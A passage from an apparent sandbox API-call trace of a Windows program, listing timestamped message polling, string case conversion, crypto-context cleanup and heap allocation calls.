wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.544] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.544] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.544] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.544] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.544] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.545] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0255.545] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.545] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0255.545] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.545] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.545] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.545] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.545] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.545] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.545] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.546] CryptDestroyKey (hKey=0xaa5760) returned 1 [0255.546] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.546] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.546] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.546] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.546] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.546] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.546] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.546] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.546] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.546] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.546] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.546] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.546] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.546] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.546] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.546] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.546] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.547] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.547] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.547] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.547] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.547] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.547] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.547] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.547] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.547] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.547] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.547] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.548] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.548] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.548] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.548] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.548] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.548] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.548] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.548] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.548] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.548] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.548] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.548] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.548] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.549] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.549] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.549] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.549] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.551] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0255.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.551] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0255.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.552] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0255.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0255.552] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0255.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.553] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.553] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0255.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.554] FreeLibrary (hLibModule=0x74d40000) returned 1 [0255.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0255.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.554] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0255.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 